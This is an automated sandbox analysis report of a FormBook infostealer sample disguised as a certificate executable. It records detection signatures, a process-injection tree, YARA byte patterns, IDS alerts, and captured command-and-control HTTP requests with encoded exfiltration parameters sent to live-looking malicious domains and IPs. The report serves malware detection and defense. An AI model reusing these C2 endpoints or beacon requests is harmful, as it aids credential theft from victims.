Windows Analysis Report
Certificate 1045-20-11.exe

Overview

General Information

Sample name: Certificate 1045-20-11.exe
Analysis ID: 1560129
MD5: 374bfa99caf54477156253c18125cdc8
SHA1: b252c1316f4d9b91e79f64c51365cf65981f64d1
SHA256: f605d6db615c055fc80141bf79ab3f541303cf082244b352352bbd982a7aca50
Tags: exe, user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Certificate 1045-20-11.exe (PID: 6548 cmdline: "C:\Users\user\Desktop\Certificate 1045-20-11.exe" MD5: 374BFA99CAF54477156253C18125CDC8)
    • svchost.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\Certificate 1045-20-11.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FGcoivYXQsEMNANuoDkk.exe (PID: 2124 cmdline: "C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6880 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • FGcoivYXQsEMNANuoDkk.exe (PID: 3752 cmdline: "C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4624 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 further entries not shown)

Source | Rule | Description | Author | Strings
1.2.svchost.exe.2520000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2520000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.2520000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2520000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ParentImage: C:\Users\user\Desktop\Certificate 1045-20-11.exe, ParentProcessId: 6548, ParentProcessName: Certificate 1045-20-11.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ProcessId: 6640, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ParentImage: C:\Users\user\Desktop\Certificate 1045-20-11.exe, ParentProcessId: 6548, ParentProcessName: Certificate 1045-20-11.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ProcessId: 6640, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T12:53:31.929353+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | TCP
2024-11-21T12:54:05.481825+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 116.50.37.244 | 80 | TCP
2024-11-21T12:55:28.530745+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49816 | 85.159.66.93 | 80 | TCP
2024-11-21T12:55:43.312625+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49983 | 91.195.240.94 | 80 | TCP
2024-11-21T12:56:06.621580+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 66.29.149.46 | 80 | TCP
2024-11-21T12:56:21.509284+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50022 | 195.110.124.133 | 80 | TCP
2024-11-21T12:56:52.795541+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50026 | 217.196.55.202 | 80 | TCP


AV Detection

Source: http://www.rssnewscast.com/fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG | Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= | Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/ | Avira URL Cloud: Label: malware
Source: Certificate 1045-20-11.exe | ReversingLabs: Detection: 28%
Source: Yara match | File source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Certificate 1045-20-11.exe | Joe Sandbox ML: detected
Source: Certificate 1045-20-11.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165025398.000000000017E000.00000002.00000001.01000000.00000004.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4165156204.000000000017E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00886CA9 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00886CA9
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, | 0_2_008860DD
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, | 0_2_008863F9
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0088EB60
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_0088F5FA
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088F56F FindFirstFileW,FindClose, | 0_2_0088F56F
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00891B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00891B2F
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00891C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00891C8A
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00891F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00891F94
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0076BAB0 FindFirstFileW,FindNextFileW,FindClose, | 3_2_0076BAB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 3_2_00759480
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 3_2_0075DD45
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_02FD053E

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49762 -> 116.50.37.244:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49816 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49983 -> 91.195.240.94:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 217.196.55.202:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 66.29.149.46:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View | IP Address: 154.215.72.110 154.215.72.110
Source: Joe Sandbox View | IP Address: 195.110.124.133 195.110.124.133
Source: Joe Sandbox View | ASN Name: REGISTER-ASIT REGISTER-ASIT
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00894EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_00894EB5
Source: global traffic | HTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.goldenjade-travel.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.magmadokum.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.rssnewscast.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?SHqP-p=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&0xilO=7vZpwBG HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.techchains.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.elettrosistemista.zip | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.empowermedeco.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic | DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic | DNS traffic detected: DNS query: www.shenzhoucui.com
Source: unknown | HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.goldenjade-travel.com | Origin: http://www.goldenjade-travel.com | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 203 | Referer: http://www.goldenjade-travel.com/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Data Ascii: SHqP-p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 21 Nov 2024 11:53:31 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Thu, 21 Nov 2024 11:53:56 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Thu, 21 Nov 2024 11:53:59 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
